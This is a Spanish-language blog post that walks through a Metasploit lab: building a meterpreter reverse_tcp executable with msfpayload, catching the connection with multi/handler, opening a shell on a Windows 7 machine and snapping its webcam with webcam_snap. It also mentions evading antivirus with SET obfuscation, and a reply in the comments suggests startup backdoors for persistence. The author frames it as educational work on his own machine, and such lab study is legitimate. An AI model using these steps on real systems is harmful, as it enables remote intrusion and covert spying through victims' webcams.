Blog

Usando meterpreter para acceder a la webcam

Hola!

Ya estoy empezando a hacer prácticas más avanzadas, así que en este post voy vamos a utilizar metasploit para tener acceso a una máquina con Windows 7.  Generaremos un archivo que se tendrá que ejecutar en la máquina víctima.

Esta manera es la que yo he encontrado más fácil, después de ver algunos videos que hay por la red (sobretodo en otros idiomas).

Lo primero es ejecutar metasploit.

En un terminal ejecutamos “msfconsole”.

imagen1

Una vez que se carga, tecleamos “show exploits” donde nos muestra los exploits que se encuentran.  Una vez que localizamos el que nos interesa ( WINDOWS/SMB/MS08_067_NETAPI), copiamos la ruta y, en el terminal ponemos lo siguiente:

imagen2

imagen3

En este punto, tecleamos “show payloads” para ver los payloads”.

Una vez localizado el que buscamos ( Windows/meterpreter/reverse_tcp), abrimos otro terminal y ponemos lo siguiente:

“Msfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=4444 x > /usr/prueba.exe”

imagen4

donde una que vez termine, nos vamos a la carpeta usr y encontraremos el archivo ‘prueba.exe”.

imagen5

Cogemos este archivo y hay que conseguir que lo ejecuten en la máquina víctima (en este caso, es un entorno de Red), que lo conseguí porque la máquina es mia. J

Una vez que está en la victima el archivo, nos vamos a la terminal donde usamos el exploit y ejecutamos “use multi/handler” para permanecer a la escucha.

imagen6

Definimos la IP del atacante con “set LHOST ipatacante” y “set LPORT puerto”.

Ponemos “exploit” y se ejecuta. Se queda  a la “escucha”, esperando que el payload se ejecute en la máquina victima y se conecte.

Una vez que lo ejecutan, nos aparece en el terminal esto:

imagen7

Ponemos “Shell” y ya estamos en el prompt del ordenador infectado.

Lo que me llamó la atención fue el  acceder a la webcam de la victima.

Para ello, ponemos “exit” para volver al prompt de “meterpreter” y ponemos “webcam_list” para acceder a la webcam disponibles en el equipo.

Posteriormente, ponemos “webcam_snap” y nos realizará una captura de la webcam en ese momento.

Y la captura…..

camiseta

Eso es todo amigos…..un saludo…y recordad que esto es con fines educativos….hacedlo en un entorno controlado. Yo quite el AV para evitar pasos, pero en la prueba que hice usando SET en el que ofuscaba no me lo detectaba.

David

@darksh4m4n

  1. Gw
    Gw05-21-2014

    Mi duda es, al momento de usar el comando no me funciona, hasta que en mi maquina virtual le doy click al .exe, no ai alguna forma de que siempre este encendido?

    • David
      David05-28-2014

      Hola Gw….perdona que tarde en responderte…
      Una vez que esa persona hace click al archivo infectado, es cuando se ha creado una conexión entre su máquina y la tuya…si quieres mantener esa conexión ya tendrias que realizar “post-exploiting”, usando backdoors para que se ejecutaran al iniciar y no tendrías que realizar este proceso.
      Un saludo y gracias

Leave a Reply

*

    No Twitter Messages